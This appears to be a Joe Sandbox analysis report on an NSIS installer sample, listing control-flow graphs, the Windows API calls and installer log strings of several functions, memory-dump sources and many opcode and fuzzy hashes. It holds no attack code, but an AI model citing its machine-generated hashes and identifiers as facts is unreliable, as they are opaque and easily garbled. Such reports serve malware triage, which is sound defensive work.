                                                                                    • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                    • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                                                    • String ID:
                                                                                    • API String ID: 310444273-0
                                                                                    • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                    • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                    • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                    • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                    APIs
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                    • ShowWindow.USER32(?), ref: 00401753
                                                                                    • ShowWindow.USER32(?), ref: 00401767
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                    Strings
                                                                                    • Rename: %s, xrefs: 004018F8
                                                                                    • Rename failed: %s, xrefs: 0040194B
                                                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                    • detailprint: %s, xrefs: 00401679
                                                                                    • Sleep(%d), xrefs: 0040169D
                                                                                    • Rename on reboot: %s, xrefs: 00401943
                                                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                                                    • Aborting: "%s", xrefs: 0040161D
                                                                                    • Call: %d, xrefs: 0040165A
                                                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                    • Jump: %d, xrefs: 00401602
                                                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                    • BringToFront, xrefs: 004016BD
                                                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                    • API String ID: 2872004960-3619442763
                                                                                    • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                    • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                    • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                    • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                    APIs
                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                    • ShowWindow.USER32(?), ref: 004054FE
                                                                                    • DestroyWindow.USER32 ref: 00405512
                                                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                    • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                    • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                    • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                    • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                    • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                    • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                    • EnableWindow.USER32(?,?), ref: 00405783
                                                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                    • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                    • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                    • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                    • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3282139019-0
                                                                                    • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                    • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                    • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                    • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                    APIs
                                                                                      • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                      • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                      • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                    • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                    • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                    • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                    • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                      • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                      • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                    • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                    • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                    • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                    • API String ID: 608394941-2746725676
                                                                                    • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                    • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                    • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                    • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    • lstrcatW.KERNEL32(00000000,00000000,226,004D70B0,00000000,00000000), ref: 00401A76
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,226,226,00000000,00000000,226,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426576,759223A0,00000000), ref: 00404FD6
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FE6
                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FF9
                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                    • String ID: 226$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                                    • API String ID: 4286501637-1297904356
                                                                                    • Opcode ID: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                    • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                    • Opcode Fuzzy Hash: 64a557673ae3d0e019bdca1bc4e77ebfe7370d638d91dc23aa74aa5952768e1c
                                                                                    • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004033F1
                                                                                    • GetTickCount.KERNEL32 ref: 00403492
                                                                                    • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                    • wsprintfW.USER32 ref: 004034CE
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00426576,00403792,00000000), ref: 004034FF
                                                                                    • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountFileTickWrite$wsprintf
                                                                                    • String ID: (]C$... %d%%$pAB$v%B$veB
                                                                                    • API String ID: 651206458-3810511783
                                                                                    • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                    • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                    • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
